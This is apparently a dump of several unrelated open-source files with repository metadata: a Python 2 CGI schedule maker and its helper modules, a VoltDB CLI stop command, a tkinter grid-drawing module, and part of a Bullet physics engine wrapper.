\t\t<title>
\t\t\tSchedule Maker
\t\t</title>
\t</head>
\t<body>
%s\t\t<form action="%s">
\t\t\tDescription:<br>
\t\t\t<input type="text"%s name="description" size="25"><br>
\t\t\tStart Date:<br>
\t\t\t<input type="text"%s name="start" size="25"><br>
\t\t\tEnd Date:<br>
\t\t\t<input type="text"%s name="end" size="25"><br>
\t\t\tSunday:<br>
\t\t\t<input type="text"%s name="sunday" size="25"><br>
\t\t\tMonday:<br>
\t\t\t<input type="text"%s name="monday" size="25"><br>
\t\t\tTuesday:<br>
\t\t\t<input type="text"%s name="tuesday" size="25"><br>
\t\t\tWednesday:<br>
\t\t\t<input type="text"%s name="wednesday" size="25"><br>
\t\t\tThursday:<br>
\t\t\t<input type="text"%s name="thursday" size="25"><br>
\t\t\tFriday:<br>
\t\t\t<input type="text"%s name="friday" size="25"><br>
\t\t\tSaturday:<br>
\t\t\t<input type="text"%s name="saturday" size="25"><br>
\t\t\t<input type="submit" value="Create Schedule">
\t\t</form>
\t</body>
</html>''' % tuple([error, os.path.basename(sys.argv[0])] \
+ unpack(values, KEYS)))
def has_keys(dictionary, keys):
for key in keys:
        if key not in dictionary:
return False
return True
def show_table():
values = Zcgi.dictionary
if not values['description']:
show_form('You must enter a description.')
try:
start = time.strptime(values['start'], '%m/%d/%y')
end = time.strptime(values['end'], '%m/%d/%y')
except:
show_form('Dates must be in the MM/DD/YY format.')
try:
assert time.mktime(end) > time.mktime(start)
except:
show_form('The end date must come after the start date.')
try:
check_week(values, KEYS[3:])
except WeekError, problem:
show_form(str(problem))
html = create_html(values['description'], start, end, unpack(values, KEYS[3:]))
Zcgi.print_html(html)
def unpack(values, keys):
unpacked = []
for key in keys:
unpacked.append(values[key])
return unpacked
def check_week(dictionary, keys):
for key in keys:
try:
if not dictionary[key]:
continue
hm = dictionary[key].split('-')
assert len(hm) == 2
first = time.strptime(hm[0].strip(), '%H:%M')
second = time.strptime(hm[1].strip(), '%H:%M')
dictionary[key] = hm[0].strip() + ' - ' + hm[1].strip()
except:
raise WeekError(key.capitalize() + ' should be in the HH:MM - HH:MM format.')
try:
assert second.tm_hour * 60 + second.tm_min > first.tm_hour * 60 + first.tm_min
except:
raise WeekError('Start time must come before end time on ' + key.capitalize() + '.')
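# For example, 'monday' = '10:30 - 12:00' is accepted (and normalised),
# while '10.30 - 12' fails the HH:MM format check and '12:00 - 10:30'
# fails the ordering check; both raise WeekError with a message.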
def create_html(description, start, end, week):
html = '''<html>
\t<head>
\t\t<title>
\t\t\tThe Schedule
\t\t</title>
\t</head>
\t<body>
\t\t<center>
'''
start_month = start.tm_year * 12 + (start.tm_mon - 1)
end_month = end.tm_year * 12 + (end.tm_mon - 1)
for month in range(start_month, end_month + 1):
html += html_help.html_table(1, 1, 3, '\t').mutate(0, 0, create_month_html(description, start, end, week, month)).html() + '\n'
if month != end_month:
html += '\t\t\t<hr>\n'
return html + '\t\t</center>\n\t</body>\n</html>'
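# Months are indexed linearly as year*12 + (month - 1). For example,
# March 2005 maps to 2005*12 + 2 = 24062; create_month_html() recovers
# the year as (24062 / 12) % 100 = 5 and the month as 24062 % 12 + 1 = 3.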
def create_month_html(description, start, end, week, month):
start = time.mktime(start) - 43200
end = time.mktime(end) + 43200
now = time.strptime(str((month / 12) % 100).zfill(2) + ' ' + str(month % 12 + 1) + ' 01', '%y %m %d')
html = '<b>' + time.strftime('%B %Y', now) + '</b>\n'
html_month = html_help.html_month((month / 12) % 100, month % 12 + 1, 0, '\t')
html_month.table_option('border="1" width="800"').row_option('valign="top"').column_option('width="14%"')
now_month = now.tm_mon
while now.tm_mon == now_month:
mktime = time.mktime(now)
if start <= mktime <= end:
week_day = (now.tm_wday + 1) % 7
if week[week_day]:
html_month.mutate(now.tm_mday, '<b>' + description + '</b><br>\n' + week[week_day])
now = time.localtime(mktime + 86400)
return html + html_month.html()
if __name__ == '__main__':
Zcgi.execute(main, 'cgi')
################################################################################
# html_help.py
################################################################################
import time
import Zam
class html_table:
def __init__(self, rows, columns, indent, style):
self.__matrix = Zam.matrix(rows, columns, '')
self.__indent = indent
self.__style = style
self.__table_option = ''
self.__row_option = ''
self.__column_option = ''
def mutate(self, row, column, text):
assert type(text) is str
self.__matrix[row][column] = text
return self
def access(self, row, column):
return self.__matrix[row][column]
def table_option(self, string):
assert type(string) is str
self.__table_option = string
return self
def row_option(self, string):
assert type(string) is str
self.__row_option = string
return self
def column_option(self, string):
assert type(string) is str
self.__column_option = string
return self
def html(self):
html = self.__style * self.__indent + '<table'
if self.__table_option:
html += ' ' + self.__table_option
html += '>\n'
for row in self.__matrix:
html += self.__style * (self.__indent + 1) + '<tr'
if self.__row_option:
html += ' ' + self.__row_option
html += '>\n'
for item in row:
html += self.__style * (self.__indent + 2) + '<td'
if self.__column_option:
html += ' ' + self.__column_option
html += '>\n'
html += ''.join([self.__style * (self.__indent + 3) + line + '\n' for line in item.splitlines()])
html += self.__style * (self.__indent + 2) + '</td>\n'
html += self.__style * (self.__indent + 1) + '</tr>\n'
return html + self.__style * self.__indent + '</table>'
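# A short illustration (values are hypothetical) of html_table in use:
#
#   t = html_table(1, 2, 0, '\t')
#   t.mutate(0, 0, 'left').mutate(0, 1, 'right').table_option('border="1"')
#   print t.html()
#
# renders a one-row, two-column HTML table with a visible border.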
class html_month:
def __init__(self, year, month, indent, style):
matrix = self.__make_matrix(year, month)
self.__table = html_table(len(matrix) + 1, 7, indent, style)
for index, item in enumerate(('Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday')):
self.__table.mutate(0, index, '<b>' + item + '</b>')
for row in range(len(matrix)):
for column in range(7):
if matrix[row][column]:
self.__table.mutate(row + 1, column, '<b>' + str(matrix[row][column]).zfill(2) + '</b>\n<hr>\n')
def __make_matrix(self, year, month):
rows = [Zam.array(7, 0)]
row = 0
now = time.localtime(time.mktime(time.strptime(str(year).zfill(2) + ' ' + str(month).zfill(2) + ' 01', '%y %m %d')) + 14400)
self.__first_day = (now.tm_wday + 1) % 7
once = False
while now.tm_mon == month:
if once:
if now.tm_wday == 6:
rows.append(Zam.array(7, 0))
row += 1
else:
once = True
rows[row][(now.tm_wday + 1) % 7] = now.tm_mday
self.__days_in_month = now.tm_mday
now = time.localtime(time.mktime(now) + 86400)
return rows
def mutate(self, day, text):
row, column = self.__get_pos(day)
self.__table.mutate(row, column, self.__table.access(row, column)[:15] + text)
return self
def access(self, day):
row, column = self.__get_pos(day)
return self.__table.access(row, column)[15:]
def __get_pos(self, day):
assert 1 <= day <= self.__days_in_month
pos = self.__first_day - 1 + day
return pos / 7 + 1, pos % 7
def table_option(self, string):
self.__table.table_option(string)
return self
def row_option(self, string):
self.__table.row_option(string)
return self
def column_option(self, string):
self.__table.column_option(string)
return self
def html(self):
return self.__table.html()
################################################################################
# Zam.py
################################################################################
# Name & Description
# ==================
'''Support module for array and matrix use.
This module provides two classes that emulate one and two
dimentional lists with fixed sizes but mutable internals.'''
# Data & Imports
# ==============
__all__ = ['array', 'matrix']
__version__ = '1.1'
import sys
# Public Names
# ============
class array(object):
'''array(length) -> new array
array(length, value) -> initialized from value'''
def __init__(self, length, value=None):
'''x.__init__(...) initializes x'''
self.__data = range(length)
for index in range(length):
self.__data[index] = value
def __repr__(self):
'''x.__repr__() <==> repr(x)'''
return repr(self.__data)
def __len__(self):
'''x.__len__() <==> len(x)'''
return len(self.__data)
def __getitem__(self, key):
'''x.__getitem__(y) <==> x[y]'''
return self.__data[key]
def __setitem__(self, key, value):
'''x.__setitem__(i, y) <==> x[i]=y'''
self.__data[key] = value
def __delitem__(self, key):
'''x.__delitem__(y) <==> del x[y]'''
self.__data[key] = None
def __iter__(self):
'''x.__iter__() <==> iter(x)'''
return iter(self.__data)
def __contains__(self, value):
'''x.__contains__(y) <==> y in x'''
return value in self.__data
class matrix(object):
'''matrix(rows, columns) -> new matrix
matrix(rows, columns, value) -> initialized from value'''
def __init__(self, rows, columns, value=None):
'''x.__init__(...) initializes x'''
self.__data = array(rows)
for index in range(rows):
self.__data[index] = array(columns, value)
def __repr__(self):
'''x.__repr__() <==> repr(x)'''
return repr(self.__data)
def __len__(self):
'''x.__len__() <==> len(x)'''
return len(self.__data)
def __getitem__(self, key):
'''x.__getitem__(y) <==> x[y]'''
return self.__data[key]
def __setitem__(self, key, value):
'''x.__setitem__(i, y) <==> x[i]=y'''
self.__data[key] = array(len(self.__data[key]), value)
def __delitem__(self, key):
'''x.__delitem__(y) <==> del x[y]'''
self.__data[key] = array(len(self.__data[key]))
def __iter__(self):
'''x.__iter__() <==> iter(x)'''
return iter(self.__data)
def __contains__(self, value):
'''x.__contains__(y) <==> y in x'''
for item in self.__data:
if value in item:
return True
return False
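# Example (hypothetical values) of the fixed-size containers:
#
#   m = matrix(2, 3, 0)   # 2x3 matrix initialised to 0
#   m[0][1] = 5           # cells remain mutable
#   5 in m                # -> True
#   del m[1]              # resets row 1 to an array of None values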
# Private Names
# =============
def main():
print 'Content-Type: text/plain'
print
print file(sys.argv[0]).read()
# Execute Main
# ============
if __name__ == '__main__':
main()
################################################################################
# Zcgi.py
################################################################################
# Name & Description
# ==================
'''Support module for use by CGI scripts.
This module provides several functions and variables
that help with printing text and accessing form data.'''
# Data & Imports
# ==============
__all__ = ['execute', 'print_html', 'print_plain', 'print_self',
'dictionary', 'string']
__version__ = '1.2'
import os
import sys
import types
# Public Names
# ============
def execute(main, exception):
    '''execute(function main, str exception)
    Run main() unless the query string equals exception,
    in which case print this script's own source.'''
assert_type((types.FunctionType, main), (str, exception))
if exception == string:
print_self()
else:
main()
def print_html(text):
'''print_html(str text)
Print text as HTML.'''
assert_type((str, text))
print 'Content-Type: text/html'
print
print text
sys.exit(0)
def print_plain(text):
'''print_plain(str text)
Print text as plain.'''
assert_type((str, text))
print 'Content-Type: text/plain'
print
print text
sys.exit(0)
def print_self():
'''print_self()
Print __main__ as plain.'''
print 'Content-Type: text/plain'
print
print file(sys.argv[0]).read()
sys.exit(0)
# Private Names
# =============
def export():
global dictionary, string
dictionary = string = None
try:
string = os.environ['QUERY_STRING']
temp = string.replace('+', ' ').split('&')
for index in range(len(temp)):
temp[index] = temp[index].split('=')
dictionary = dict()
for parameter, value in temp:
dictionary[decode(parameter)] = decode(value)
except:
pass
def decode(string):
assert_type((str, string))
index = string.find('%')
while index != -1:
string = string[:index] + chr(int(string[index+1:index+3], 16)) + string[index+3:]
index = string.find('%', index + 1)
return string
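# For example, decode('a%20b%21') expands '%20' to chr(0x20) and '%21'
# to chr(0x21), returning 'a b!'.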
def assert_type(*tuples):
    for expected, obj in tuples:
        if type(obj) is not expected:
            raise TypeError
# Execute Conditional
# ===================
if __name__ == '__main__':
print_self()
else:
export()
|
mit
| -5,567,249,290,560,385,000
| 28.228797
| 135
| 0.512113
| false
| 3.504967
| false
| false
| false
|
eoneil1942/voltdb-4.7fix
|
lib/python/voltcli/voltdb.d/stop.py
|
1
|
1682
|
# This file is part of VoltDB.
# Copyright (C) 2008-2014 VoltDB Inc.
#
# This file contains original code and/or modifications of original code.
# Any modifications made by VoltDB Inc. are licensed under the following
# terms and conditions:
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
import signal
from voltcli import utility
@VOLT.Command(
description = 'Stop a VoltDB server daemon.',
options = [
VOLT.StringOption('-H', '--host', 'host',
'HOST[:PORT] (default HOST=localhost, PORT=3021)',
default='localhost:3021'),
]
)
def stop(runner):
daemonizer = runner.create_daemonizer(description="VoltDB server")
daemonizer.stop_daemon()
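# Example invocation (hypothetical host), given the option defined above:
#
#   voltdb stop --host myhost:3021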
|
agpl-3.0
| -6,828,493,845,769,102,000
| 40.04878
| 73
| 0.743757
| false
| 4.173697
| false
| false
| false
|
efanescent/SapidCircuits
|
World.py
|
1
|
2775
|
import Control
from tkinter.messagebox import showerror
from Window import *
from Utils import *
canvas, field, scale = None, None, None
def init(window, p_field=-1, p_scale=10):
"""using to init World with params"""
global canvas, field, scale
canvas = tk.Canvas(window, highlightthickness=0, bg='#FFF3A4')
canvas.pack(side='top', fill='both', expand=True)
field = p_field
scale = p_scale
    # automatically bind keyboard control
    try:
        set_control()
    except Exception:
        showerror('Error', 'Control can\'t be set')
def set_field(p_field):
"""set up field in the world"""
global field
field = p_field
def clear():
"""remove all elements from canvas"""
global canvas
canvas.delete('all')
def scale_(*args, **kwargs):
"""universal function for set/get/change scale
if arg is num - change scale
if kwarg wiz index 'set' - set scale
and then return current scale"""
global scale
for arg in args:
        if isinstance(arg, (int, float)):
            scale += arg
for key in kwargs:
if key == 'set':
scale = kwargs[key]
return scale
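# Examples (hypothetical values) of the three calling styles:
#
#   scale_()        # get: returns the current scale
#   scale_(5)       # change: adds 5 to the current scale
#   scale_(set=20)  # set: replaces the scale with 20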
def draw():
global canvas, field, scale
if field == -1: return False
    # Redrawing everything from scratch is simple, though not the most efficient approach.
clear()
# redraw empty tiles
cx, cy = field.x, field.y
for col in range(int(field.height)):
for row in range(int(field.width)):
canvas.create_rectangle(cx, cy, cx+1000/scale, cy+1000/scale)
cx += (1000/scale)
cx = field.x
cy += (1000/scale)
def set_control():
"""set control..."""
canvas.master.bind_all('<Key>', Control.pressed)
def move_view(**kwargs):
for key in kwargs:
if key == 'x':
canvas.xview_scroll(int(kwargs[key]), 'units')
if key == 'y':
canvas.yview_scroll(int(kwargs[key]), 'units')
class Field:
"""class contains tiles"""
def __init__(self, sx, sy, width, height):
self.x = sx # start x
self.y = sy # start y
        # width and height in units (e.g. 2x3 = 6 units, i.e. tiles)
self.width = width
self.height = height
self.tiles = dict() # no tiles, excepting empty
def add_tile(self, tx, ty, tile):
"""add tile in tiles container"""
self.tiles[tile_xy2i(tx, ty)] = tile
def get_tile(self, tx, ty):
"""return tile from tiles container"""
try:
return self.tiles[tile_xy2i(tx, ty)]
        except KeyError:
return -1
def is_empty_tile(self, tx, ty):
"""return bool - tile is empty"""
try:
self.tiles[tile_xy2i(tx, ty)]
        except KeyError:
return True
else:
return False
class Tile:
def __init__(self, Id):
self.ID = Id
|
mit
| 5,046,132,535,887,485,000
| 24.943925
| 73
| 0.57045
| false
| 3.641732
| false
| false
| false
|
daviddeng/azrael
|
azrael/bullet_api.py
|
1
|
21037
|
# Copyright 2014, Oliver Nagy <olitheolix@gmail.com>
#
# This file is part of Azrael (https://github.com/olitheolix/azrael)
#
# Azrael is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# Azrael is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Azrael. If not, see <http://www.gnu.org/licenses/>.
"""
Provide classes to create-, modify- and query dynamic simulations. The classes
abstract away the particular physics engine (currently Bullet) used underneath.
This module is the *one and only* module that actually imports the Bullet
engine (ie the wrapper called `azBullet`). This will make it easier to swap out
Bullet for another engine at some point, should the need arise.
"""
import logging
import numpy as np
import azrael.types as types
import azrael.bullet.azBullet as azBullet
from IPython import embed as ipshell
from azrael.types import typecheck, RetVal, _RigidBodyData
from azrael.types import ConstraintMeta, ConstraintP2P, Constraint6DofSpring2
from azrael.types import CollShapeMeta, CollShapeSphere, CollShapeBox, CollShapePlane
# Convenience.
Vec3 = azBullet.Vec3
Quaternion = azBullet.Quaternion
Transform = azBullet.Transform
# Convenience.
RigidBodyData = types.RigidBodyData
class PyRigidBody(azBullet.RigidBody):
"""
Wrapper around RigidBody class.
The original azBullet.RigidBody class cannot be extended since it is a
compiled module. However, by subclassing it we get the convenience of
a pure Python class (eg adding attributes at runtime). This is transparent
to the end user.
"""
def __init__(self, ci):
super().__init__(ci)
class PyBulletDynamicsWorld():
"""
High level wrapper around the low level Bullet bindings.
"""
def __init__(self, engineID: int):
# Create a Class-specific logger.
name = '.'.join([__name__, self.__class__.__name__])
self.logit = logging.getLogger(name)
# To distinguish engines.
self.engineID = engineID
# Create a standard Bullet Dynamics World.
self.dynamicsWorld = azBullet.BulletBase()
# Disable gravity.
self.dynamicsWorld.setGravity(Vec3(0, 0, 0))
# Dictionary of all bodies.
self.rigidBodies = {}
def setGravity(self, gravity: (tuple, list)):
"""
Set the ``gravity`` in the simulation.
"""
try:
gravity = np.array(gravity, np.float64)
assert gravity.ndim == 1
assert len(gravity) == 3
except (TypeError, ValueError, AssertionError):
return RetVal(False, 'Invalid type', None)
self.dynamicsWorld.setGravity(Vec3(*gravity))
return RetVal(True, None, None)
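    # A quick sketch (hypothetical engine ID) of the expected behaviour:
    #
    #   world = PyBulletDynamicsWorld(engineID=1)
    #   world.setGravity((0, 0, -9.81))   # -> RetVal(True, None, None)
    #   world.setGravity('down')          # -> RetVal(False, 'Invalid type', None)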
def removeRigidBody(self, bodyIDs: (list, tuple)):
"""
Remove ``bodyIDs`` from Bullet and return the number of removed bodies.
Non-existing bodies are not counted (and ignored).
:param list bodyIDs: list of bodyIDs to remove.
:return: number of actually removed bodies.
:rtype: int
"""
cnt = 0
# Remove every body, skipping non-existing ones.
for bodyID in bodyIDs:
# Skip non-existing bodies.
if bodyID not in self.rigidBodies:
continue
# Delete the body from all caches.
del self.rigidBodies[bodyID]
cnt += 1
# Return the total number of removed bodies.
return RetVal(True, None, cnt)
def compute(self, bodyIDs: (tuple, list), dt: float, max_substeps: int):
"""
Step the simulation for all ``bodyIDs`` by ``dt``.
This method aborts immediately if one or more bodyIDs do not exist.
The ``max_substeps`` parameter tells Bullet the maximum allowed
        granularity. Typical values for ``dt`` and ``max_substeps`` are
(1, 60).
:param list bodyIDs: list of bodyIDs for which to update the physics.
:param float dt: time step in seconds
:param int max_substeps: maximum number of sub-steps.
:return: Success
"""
# All specified bodies must exist. Abort otherwise.
try:
rigidBodies = [self.rigidBodies[_] for _ in bodyIDs]
except KeyError as err:
self.logit.warning('Body IDs {} do not exist'.format(err.args))
return RetVal(False, None, None)
# Add the body to the world and make sure it is activated, as
# Bullet may otherwise decide to simply set its velocity to zero
# and ignore the body.
for body in rigidBodies:
self.dynamicsWorld.addRigidBody(body)
            body.forceActivationState(4)  # 4 == DISABLE_DEACTIVATION
# The max_substeps parameter instructs Bullet to subdivide the
# specified timestep (dt) into at most max_substeps. For example, if
        # dt = 0.1 and max_substeps=10, then, internally, Bullet will simulate
# no finer than dt / max_substeps = 0.01s.
self.dynamicsWorld.stepSimulation(dt, max_substeps)
# Remove all bodies from the simulation again.
for body in rigidBodies:
self.dynamicsWorld.removeRigidBody(body)
return RetVal(True, None, None)
def applyForceAndTorque(self, bodyID, force, torque):
"""
Apply a ``force`` and ``torque`` to the center of mass of ``bodyID``.
:param int bodyID: the ID of the body to update
:param 3-array force: force applied directly to center of mass
:param 3-array torque: torque around center of mass.
:return: Success
"""
# Sanity check.
if bodyID not in self.rigidBodies:
msg = 'Cannot set force of unknown body <{}>'.format(bodyID)
self.logit.warning(msg)
return RetVal(False, msg, None)
# Convenience.
body = self.rigidBodies[bodyID]
# Convert the force and torque to Vec3.
b_force = Vec3(*force)
b_torque = Vec3(*torque)
# Clear pending forces (should be cleared automatically by Bullet when
# it steps the simulation) and apply the new ones.
body.clearForces()
body.applyCentralForce(b_force)
body.applyTorque(b_torque)
return RetVal(True, None, None)
def applyForce(self, bodyID: int, force, rel_pos):
"""
Apply a ``force`` at ``rel_pos`` to ``bodyID``.
:param int bodyID: the ID of the body to update
:param 3-array force: force applied directly to center of mass
:param 3-array rel_pos: position of force relative to center of mass
:return: Success
"""
# Sanity check.
if bodyID not in self.rigidBodies:
msg = 'Cannot set force of unknown body <{}>'.format(bodyID)
return RetVal(False, msg, None)
# Convenience.
body = self.rigidBodies[bodyID]
# Convert the force and torque to Vec3.
b_force = Vec3(*force)
b_relpos = Vec3(*rel_pos)
# Clear pending forces (should be cleared automatically by Bullet when
# it steps the simulation) and apply the new ones.
body.clearForces()
body.applyForce(b_force, b_relpos)
return RetVal(True, None, None)
def getRigidBodyData(self, bodyID: int):
"""
Return Body State of ``bodyID``.
        This method aborts immediately if ``bodyID`` does not exist.
:param int bodyID: the ID of body for which to return the state.
:return: ``_RigidBodyData`` instances.
"""
# Abort immediately if the ID is unknown.
if bodyID not in self.rigidBodies:
msg = 'Cannot find body with ID <{}>'.format(bodyID)
return RetVal(False, msg, None)
# Convenience.
body = self.rigidBodies[bodyID]
# Determine rotation and position.
rot = body.getCenterOfMassTransform().getRotation().topy()
pos = body.getCenterOfMassTransform().getOrigin().topy()
# Determine linear and angular velocity.
vLin = body.getLinearVelocity().topy()
vRot = body.getAngularVelocity().topy()
# Linear/angular damping factors.
axesLockLin = body.getLinearFactor().topy()
axesLockRot = body.getAngularFactor().topy()
        # Bullet does support scaling collision shapes, but doing so is
        # fraught with problems. We therefore copy the 'scale' value from
        # the body's meta data instead.
scale = body.azrael[1].scale
# Bullet will never modify the Collision shape. We may thus use the
# information from the body's meta data.
cshapes = body.azrael[1].cshapes
# Construct a new _RigidBodyData structure and add it to the list
# that will eventually be returned to the caller.
out = _RigidBodyData(scale, body.getInvMass(),
body.getRestitution(), rot, pos, vLin, vRot,
cshapes, axesLockLin, axesLockRot, 0)
return RetVal(True, None, out)
@typecheck
def setRigidBodyData(self, bodyID: int, rbState: _RigidBodyData):
"""
Update State Variables of ``bodyID`` to ``rbState``.
Create a new body with ``bodyID`` if it does not yet exist.
:param int bodyID: the IDs of all bodies to retrieve.
:param ``_RigidBodyData`` rbState: body description.
:return: Success
"""
# Create the Rigid Body if it does not exist yet.
if bodyID not in self.rigidBodies:
self.createRigidBody(bodyID, rbState)
# Convenience.
body = self.rigidBodies[bodyID]
# Convert rotation and position to Vec3.
rot = Quaternion(*rbState.rotation)
pos = Vec3(*rbState.position)
# Assign body properties.
tmp = azBullet.Transform(rot, pos)
body.setCenterOfMassTransform(tmp)
body.setLinearVelocity(Vec3(*rbState.velocityLin))
body.setAngularVelocity(Vec3(*rbState.velocityRot))
body.setRestitution(rbState.restitution)
body.setLinearFactor(Vec3(*rbState.axesLockLin))
body.setAngularFactor(Vec3(*rbState.axesLockRot))
# Build and assign the new collision shape, if necessary.
old = body.azrael[1]
if (old.scale != rbState.scale) or \
not (np.array_equal(old.cshapes, rbState.cshapes)):
# Create a new collision shape.
tmp = self.compileCollisionShape(bodyID, rbState)
mass, inertia, cshapes = tmp.data
del mass, inertia, tmp
# Replace the existing collision shape with the new one.
body.setCollisionShape(cshapes)
del old
# Update the mass but leave the inertia intact. This is somewhat
# awkward to implement because Bullet returns the inverse values yet
# expects the non-inverted ones in 'set_mass_props'.
if rbState.imass == 0:
# Static body: mass and inertia are zero anyway.
body.setMassProps(0, Vec3(0, 0, 0))
else:
m = rbState.imass
x, y, z = body.getInvInertiaDiagLocal().topy()
if (m < 1E-10) or (x < 1E-10) or (y < 1E-10) or (z < 1E-10):
# Use safe values if either the inertia or the mass is too
# small for inversion.
m = x = y = z = 1
else:
# Inverse mass and inertia.
x = 1 / x
y = 1 / y
z = 1 / z
m = 1 / m
# Apply the new mass and inertia.
body.setMassProps(m, Vec3(x, y, z))
# Overwrite the old RigidBodyData instance with the latest version.
body.azrael = (bodyID, rbState)
return RetVal(True, None, None)
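    # Worked example of the inversion above (hypothetical values): for
    # rbState.imass == 0.5 and an inverse inertia diagonal of (2, 4, 5),
    # Bullet receives mass m = 1 / 0.5 = 2 and inertia (1/2, 1/4, 1/5).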
def setConstraints(self, constraints: (tuple, list)):
"""
Apply the ``constraints`` to the specified bodies in the world.
If one or more of the rigid bodies specified in any of the constraints
do not exist then this method will abort. Similarly, it will also abort
if one or more constraints could not be constructed for whatever
reason (eg. unknown constraint name).
In any case, this function will either apply all constraints or none.
It is not possible that this function applies only some constraints.
:param list constraints: list of `ConstraintMeta` instances.
:return: Success
"""
def _buildConstraint(c):
"""
Compile the constraint `c` into the proper C-level Bullet body.
"""
# Get handles to the two bodies. This will raise a KeyError unless
# both bodies exist.
rb_a = self.rigidBodies[c.rb_a]
rb_b = self.rigidBodies[c.rb_b]
# Construct the specified constraint type. Raise an error if the
# constraint could not be constructed (eg the constraint name is
# unknown).
if c.contype.upper() == 'P2P':
tmp = ConstraintP2P(*c.condata)
out = azBullet.Point2PointConstraint(
rb_a, rb_b,
Vec3(*tmp.pivot_a),
Vec3(*tmp.pivot_b)
)
elif c.contype.upper() == '6DOFSPRING2':
t = Constraint6DofSpring2(*c.condata)
fa, fb = t.frameInA, t.frameInB
frameInA = Transform(Quaternion(*fa[3:]), Vec3(*fa[:3]))
frameInB = Transform(Quaternion(*fb[3:]), Vec3(*fb[:3]))
out = azBullet.Generic6DofSpring2Constraint(
rb_a, rb_b, frameInA, frameInB
)
out.setLinearLowerLimit(Vec3(*t.linLimitLo))
out.setLinearUpperLimit(Vec3(*t.linLimitHi))
out.setAngularLowerLimit(Vec3(*t.rotLimitLo))
out.setAngularUpperLimit(Vec3(*t.rotLimitHi))
for ii in range(6):
if not t.enableSpring[ii]:
out.enableSpring(ii, False)
continue
out.enableSpring(ii, True)
out.setStiffness(ii, t.stiffness[ii])
out.setDamping(ii, t.damping[ii])
out.setEquilibriumPoint(ii, t.equilibrium[ii])
for ii in range(3):
out.setBounce(ii, t.bounce[ii])
else:
assert False
# Return the Bullet constraint body.
return out
# Compile a list of all Bullet constraints.
try:
constraints = [ConstraintMeta(*_) for _ in constraints]
out = [_buildConstraint(_) for _ in constraints]
except (TypeError, AttributeError, KeyError, AssertionError):
return RetVal(False, 'Could not compile all Constraints.', None)
# Apply the constraints.
fun = self.dynamicsWorld.addConstraint
for c in out:
fun(c)
# All went well.
return RetVal(True, None, None)
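    # Sketch (hypothetical ConstraintMeta field order; keyword form used to
    # avoid guessing it) of a point-to-point constraint joining bodies 1 and 2:
    #
    #   con = ConstraintMeta(contype='P2P', rb_a=1, rb_b=2,
    #                        condata=ConstraintP2P(pivot_a=(0, 0, 0),
    #                                              pivot_b=(0, 0, 0)))
    #   world.setConstraints([con])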
def clearAllConstraints(self):
"""
Remove all constraints from the simulation.
:return: success
"""
# Convenience.
world = self.dynamicsWorld
# Return immediately if the world has no constraints to remove.
if world.getNumConstraints() == 0:
return RetVal(True, None, None)
# Iterate over all constraints and remove them.
for c in world.iterateConstraints():
world.removeConstraint(c)
# Verify that the number of constraints is now zero.
if world.getNumConstraints() != 0:
return RetVal(False, 'Bug: #constraints must now be zero', None)
else:
return RetVal(True, None, None)
@typecheck
def compileCollisionShape(self, bodyID: int, rbState: _RigidBodyData):
"""
Return the correct Bullet collision shape based on ``rbState``.
This is a convenience method only.
        fixme: find out how to combine mass/inertia of bodies composed of multiple shapes.
:param int bodyID: body ID.
:param _RigidBodyData rbState: meta data to describe the body.
:return: compound shape with all the individual shapes.
:rtype: ``CompoundShape``
"""
# Create the compound shape that will hold all other shapes.
compound = azBullet.CompoundShape()
# Aggregate the total mass and inertia.
tot_mass = 0
tot_inertia = Vec3(0, 0, 0)
# Bodies with virtually no mass will be converted to static bodies.
# This is almost certainly not what the user wants but it is the only
# safe option here. Note: it is the user's responsibility to ensure the
# mass is reasonably large!
if rbState.imass > 1E-4:
rbState_mass = 1.0 / rbState.imass
else:
rbState_mass = 0
# Create the collision shapes one by one.
scale = rbState.scale
for name, cs in rbState.cshapes.items():
# Convert the input data to a CollShapeMeta tuple. This is
# necessary if the data passed to us here comes straight from the
            # database because then it is merely a list of values, not (yet)
# a named tuple.
cs = CollShapeMeta(*cs)
# Determine which CollisionShape to instantiate, scale it
            # accordingly, and create it in Bullet.
cstype = cs.cstype.upper()
if cstype == 'SPHERE':
sphere = CollShapeSphere(*cs.csdata)
child = azBullet.SphereShape(scale * sphere.radius)
elif cstype == 'BOX':
box = CollShapeBox(*cs.csdata)
hl = Vec3(scale * box.x, scale * box.y, scale * box.z)
child = azBullet.BoxShape(hl)
elif cstype == 'EMPTY':
child = azBullet.EmptyShape()
elif cstype == 'PLANE':
# Planes are always static.
rbState_mass = 0
plane = CollShapePlane(*cs.csdata)
normal = Vec3(*plane.normal)
child = azBullet.StaticPlaneShape(normal, plane.ofs)
else:
child = azBullet.EmptyShape()
msg = 'Unrecognised collision shape <{}>'.format(cstype)
self.logit.warning(msg)
# Let Bullet compute the local inertia of the body.
inertia = child.calculateLocalInertia(rbState_mass)
# Warn about unreasonable inertia values.
if rbState_mass > 0:
tmp = np.array(inertia.topy())
if not (1E-5 < np.sqrt(np.dot(tmp, tmp)) < 100):
msg = 'Inertia = ({:.1E}, {:.1E}, {:.1E})'
self.logit.warning(msg.format(*inertia.topy()))
del tmp
# Add the collision shape at the respective position and
# rotation relative to the parent.
t = azBullet.Transform(Quaternion(*cs.rotation),
Vec3(*cs.position))
compound.addChildShape(t, child)
tot_mass += rbState_mass
tot_inertia += inertia
